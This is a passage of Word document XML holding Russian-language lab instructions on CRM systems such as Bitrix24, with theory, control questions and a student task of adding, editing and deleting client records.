        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00B05EC8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00AD2C0E" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CRM</w:t>
      </w:r>
      <w:r w:rsidR="00B05EC8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-система управления взаимоотношениями с клиентами. CRM служит для учета потенциальных и текущих клиентов, журналистов, партнеров и других </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00B05EC8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>лидов</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00B05EC8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Битрикс24</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRM позволяет вести базу контактов и компаний, с которыми вы сотрудничаете, и фиксировать все события (например, звонки, письма, встречи), связанные с этой компанией, планировать свою деятельность по продажам, строить </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>воронку продаж</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CRM содержит инструменты для создания отчетов, импорта/экспорта контактов, анализа и сегментации целевой аудитории. На основе полученных из CRM данных вы можете распределять списки потенциальных клиентов между менеджерами отделов продаж, планировать рекламные акции и впоследствии анализировать их эффективность.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вы можете выбрать группу контактов в CRM и сразу всем отправить какое-то сообщение. Или прямо из списка выбрать и один контакт и отправить сообщение ему лично.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Взглянув на </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>воронку продаж</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, вы сразу увидите и сколько сделок в обработке, и сколько из них на стадиях уточнения информации и коммерческих предложений, и сколько находится в процессе переговоров, и, наконец, сколько сделок уже заключено. Каждый из этапов отображается визуально в виде цветных полос, длина которых соответствует количественному и процентному соотношению сделок на этих этапах. Для каждого из этапов также отображается сумма сделок в рублях.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Вы можете очень гибко распределять доступ к элементам CRM между сотрудниками компании. Группе, департаменту или отдельному пользователю на портале сопоставляется роль (менеджер, администратор, руководитель и т.д.). В соответствии с этими ролями </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>раздается</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступ к элементам CRM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обработку Лидов и Сделок вы можете автоматизировать с помощью бизнес-процессов. Включите в бизнес-процесс все возможные действия над элементом CRM: разослать письма, назначить ответственных, поставить задачу сотруднику и т.д. Бизнес-процесс может автоматически изменять статусы элементов CRM, заполнять поля, создавать новые элементы, например, сделки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое CRM?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Кто является потенциальным клиентом компании?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Как узнать за каким менеджером числится клиент?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF0A98" w:rsidRPr="00617AC0" w:rsidRDefault="00CF0A98" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00964E54" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF0A98" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Управление контактами с клиентом при помощи систем CRM. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Провести работу с клиентской базой в CRM системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Требования к отчету</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Отчет, в котором содержатся изображения этапов работы с пояснениями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зайти в CRM систему под своим логином.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зайти во вкладку “Клиенты”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Используя интерфейс приложения добавить несколько клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изменить информацию у созданных клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Удалить созданных клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00B05EC8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Стратегия конкурентной борьбы состоит в том, чтобы выделяться. Это означает, что необходимо тщательно выбрать оригинальный способ предложения уникального сочетания свойств</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Управление отношениями с клиентами (Customer Relationship Management, CRM) представляет собой определенную философию бизнеса, гармонизирующую стратегию, культуру ведения бизнеса, информацию о клиентах и технологию в целях взаимовыгодного управления взаимодействием предприятия и потребителя. Единственным долгосрочным конкурентным преимуществом является возможность более быстрого и обоснованного принятия решений. Сегодня уже трудно представить продукты без мощных операционных возможностей, богатой функциональности и высокого качества, рынок требует постоянного снижения цен и быстрого целевого маркетинга, и CRM постепенно становится таким же необходимым и общепринятым элементом бизнеса. И на этом промежуточном этапе у каждой компании есть шанс выделиться с помощью CRM, пока другие компании только решают, какие преимущества им может принести эта сфера управления.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CRM заключается в использовании данных о клиентах, маркетинговых моделей и реальных событий для улучшения обслуживания потребителей. Оно позволяет провести сегментацию клиентов и индивидуализировать подход к каждому клиенту. По сути CRM стал результатом интенсивной конкуренции между предприятиями. Он также является следствием осознания ими того, что завоевание нового клиента представляет собой гораздо более дорогостоящее мероприятие, чем удержание существующих, что новые клиенты, как правило, переходят от компаний-конкурентов, и что, по большому счету, любая компания есть поставщик некого </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>розничного товара</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, и ее успех зависит от его </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>продажи</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Поэтому для выживания и достижения успеха на рынке необходимо иметь четкое представление о требованиях CRM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Целями CRM являются: поддержка рационального диалога с потребителем, повышение прибыльности взаимодействия с потребителями, обеспечение широкого общего доступа потребителей к соответствующим данным компании, снижение стоимости завоевания новых клиентов, цен на продукты и услуги и текучести рентабельной клиентуры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Каждая компания должна изыскать способ привлечения и сохранения прибыльных клиентов путем эффективного использования информации. Рынок можно завоевать не только конкурентоспособной ценой. Некоторые из лидеров рынка имеют весьма высокие для своих секторов, цены, однако они постоянно расширяют ассортимент согласно информации о предпочтениях клиентов, полученной из данных транзакций и внутренних профайлов, а также данных сторонних организаций.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как бизнес-стратегия CRM требует от предприятия четкого понимания таких основных для управления отношениями с клиентами понятий, как удовлетворенность клиентов, достижение которой возможно через равноправный доступ к информации вне зависимости от канала связи, избранного клиентом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Невозможно улучшить то, что вы не можете оценить. И явно недостаточно оценивать клиентов только на основе общих показателей. Индивидуальная перспективная система оценки потребителя является основой сегментации. Безусловно, при ведении бизнеса разумнее концентрировать усилия не на примитивном увеличении числа клиентов, а в области повышения качества обслуживания и продления срока сотрудничества с наиболее перспективными из них. И самым лучшим средством достижения эти целей является ориентированное на CRM Хранилище данных, сочетающего в себе необходимые данные, организованный доступ к этим данным и функциональность для их соответствующей оценки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>К сожалению, многие компании, берущиеся за реализацию CRM, недостаточно продумывают аспекты организованного использования этих данных помимо собственно области управления отношениями с клиентами. Именно клиент, а не продукт, должен стать центром вселенной. Кроме того, помимо качественной технической реализации требуется синхронизация маркетинга, стратегии предприятия и управления клиентскими отношениями, иначе цели CRM просто не буду достигнуты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Организационная структура CRM может принимать различные формы. Необходимо, однако, чтобы весь бизнес вращался вокруг клиента, а не продукта. При этом обязательными являются следующие элементы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Управление клиентскими данными: Обеспечение качества данных и совместимости для внутренних и внешних данных, используемых для сегментации и развития продвижения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сегментация клиентов: Оценка и группировка клиентов по их прибыльности и другим показателям, важным для поддержки продвижения и управления отношениями с клиентами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разработка целевого продвижения: Разработка целевого продвижения для отдельных потенциальных сегментов или отдельных возможных потребителей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эффективность продвижения: Оценка эффективности продвижения в количественных показателях и выявление причин наличия/отсутствия успеха.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Управление каналами продвижения: Обеспечение возможности полного и быстрого использования канала для доставки рекламы и сообщений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Управление удовлетворенностью клиентов: Название элемента говорит само за себя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В целом, ориентация продвижения на определенных клиентов по соответствующим каналам при одновременном поддержании скоординированного имиджа компании является прерогативой руководителей фирмы. Однако, эффективный CRM требует от бизнес-команды серьезного взаимодействия и согласованности. Организационные элементы стратегии CRM важны не менее технических. Использование CRM как стратегии конкурентной борьбы означает ее обязательную поддержку на уровне организационной структуры предприятия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое CRM?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какую информацию о клиенте целесообразно хранить?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
